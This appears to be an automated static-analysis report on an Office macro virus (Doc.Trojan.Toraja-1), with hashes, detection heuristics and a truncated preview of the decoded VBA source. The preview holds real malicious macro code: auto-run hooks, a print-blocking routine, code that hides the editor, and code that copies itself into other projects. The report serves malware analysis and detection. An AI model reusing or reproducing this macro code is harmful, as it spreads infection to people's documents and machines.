Doc.Trojan.Toraja-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 165b63f08b441601…

MALICIOUS

Office (OLE)

62.5 KB Created: 2002-02-20 07:43:42 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 0f429bbe19873cf1e7435801576d5938 SHA-1: 8cfd96d709822881e5d0421e056e2daa41a6d113 SHA-256: 165b63f08b44160145e8f100c9632690e7372a8ef6d59d93ea9703a960d5c588
300 Risk Score

Malware Insights

Doc.Trojan.Toraja-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Office document containing VBA macros, specifically triggering AutoOpen and CreateObject heuristics, indicating malicious intent. The ClamAV detection 'Doc.Trojan.Toraja-1' strongly suggests this family. The VBA script likely attempts to download and execute a second-stage payload, as indicated by the 'CreateObject' call and the general behavior associated with this detection name.

Heuristics 6

  • ClamAV: Doc.Trojan.Toraja-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Toraja-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16919 bytes
SHA-256: c1473e5f3ccf34615c0385aa338434c8705a88b522495c1fc646928523b4eb22
Detection
ClamAV: Doc.Trojan.Toraja-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforePrint(Cancel As Boolean)
On Error Resume Next
If PrintOke = False Then
    Serang
    Cancel = True
End If
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Toraja12"






'Created       : Toraja High Land 1998 by Marsel - Lina
'Modified       : July 1999
'--------------------------------------------------------------
Option Explicit
Option Compare Text
Dim Komp As Variant
Public Const regApp As String = "Application"
Public Const regSecSet As String = "Settings"
Public Const regSecApp As String = "AppName"
Const TempVer As String = "Tana"
Const MacName As String = "Toraja"
Const Ver As String = "12"
Dim ctl As Variant
Global blnFound As Boolean
Dim CusProp
Dim blnMod As Boolean
Public Const TimerOn = "01:00:00"
Const Akhir = 80
Dim Caption As String
Dim actWindow
Global Active
Global Temp
Global TempPath
Dim Waktu
Dim Bar As Integer
Sub Register()
Attribute Register.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next


If GetSetting(regApp, regSecSet, "Version") <> Ver Then SaveSetting regApp, regSecSet, "Version", Ver
If GetSetting(regApp, regSecSet, "UserKeyWord") <> MacName & Ver Then SaveSetting regApp, regSecSet, "UserKeyWord", ""
If GetSetting(regApp, regSecSet, "AuthorKeyWord") <> "Marsel" Then SaveSetting regApp, regSecSet, "AuthorKeyWord", ""
End Sub
Function Serang() As Boolean
Attribute Serang.VB_ProcData.VB_Invoke_Func = " \n14"
Dim getDate As Date
On Error Resume Next
getDate = GetSetting(regApp, regSecSet, "FirstRun")
If getDate <= Date Then ShowMe
End Function
Sub AutoExec()
Attribute AutoExec.VB_ProcData.VB_Invoke_Func = " \n14"
        Application.EnableCancelKey = 0
        Application.DisplayRecentFiles = False
        SaveSetting regApp, regSecApp, "Microsoft Word", "True"
        MenuWord
        ExportXls
        Register
        Documents.Add
        Application.OnTime Now + TimeValue(TimerOn), "OnTimer"
End Sub
Sub AutoNew()
Attribute AutoNew.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
TempActive
ActiveWindow.View.Type = 3
End Sub
Sub AutoOpen()
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Dim strRun As String
        Application.EnableCancelKey = 0
        If PWords = False Then Application.ShowVisualBasicEditor = False
        ActiveTemp
        RemoveAll
        MenuWord
        Register
        If blnFound = True Then
            strRun = TempVer & Ver & "." & MacName & Ver & ".FoundIt"
            Application.OnTime Now + TimeValue("00:01:00"), strRun
       End If
End Sub
Function KeyWord() As Boolean
Attribute KeyWord.VB_ProcData.VB_Invoke_Func = " \n14"
If GetSetting(regApp, regSecSet, "UserKeyWord") = MacName & Ver Then KeyWord = True
End Function
Sub FileOpen()
Attribute FileOpen.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
    WordBasic.DisableAutoMacros 1
    Dialogs(80).Show
    TempActive
    WordBasic.DisableAutoMacros 0
End Sub
Function KompProject(Asal, Tujuan) As Boolean
Attribute KompProject.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo Salah
blnMod = False
For Each Komp In Tujuan.VBProject.VBComponents
      If Komp.Name = MacName & Ver Then blnMod = True
      If (Komp.Name <> "ThisDocument") And (Komp.Name <> "Reference To Normal") And (Komp.Name <> MacName & Ver) And _
          (Left(Komp.Name, 5) <> "Sheet") And (Komp.Name <> "ThisWorkbook") And (Left(Komp.Name, 5) <> "Chart") Then
            Tuj
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.